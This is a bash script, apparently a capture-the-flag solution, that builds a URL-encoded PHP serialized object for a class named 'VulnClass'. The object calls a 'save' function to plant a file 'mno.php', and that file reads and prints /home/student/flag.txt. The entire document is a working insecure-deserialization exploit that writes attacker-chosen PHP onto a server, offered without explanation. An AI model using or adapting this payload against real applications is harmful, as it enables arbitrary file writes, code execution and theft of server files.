#!/bin/bash
 
PATH='mno.php'
DATA='
<?php
$filename = "/home/student/flag.txt";

if (file_exists($filename)) {
    $file = fopen($filename, "r");
    $content = fread($file, filesize($filename));
    fclose($file);
    echo $content;
} else {
    echo "Error: File does not exist.";
}
?>
'

PATH="s:${#PATH}:\"${PATH}\""
DATA="s:${#DATA}:\"${DATA}\""
 
PREFIX='O:9:"VulnClass":2:'
FUNC='s:4:"func";s:4:"save"'
 
IDK="${PREFIX}\
{${FUNC};s:4:\"args\";a:2:{i:0;${PATH};i:1;${DATA};}}"
 
echo "$IDK"
echo
echo -n "$IDK" | /usr/bin/jq -srR @uri
exit 0
 
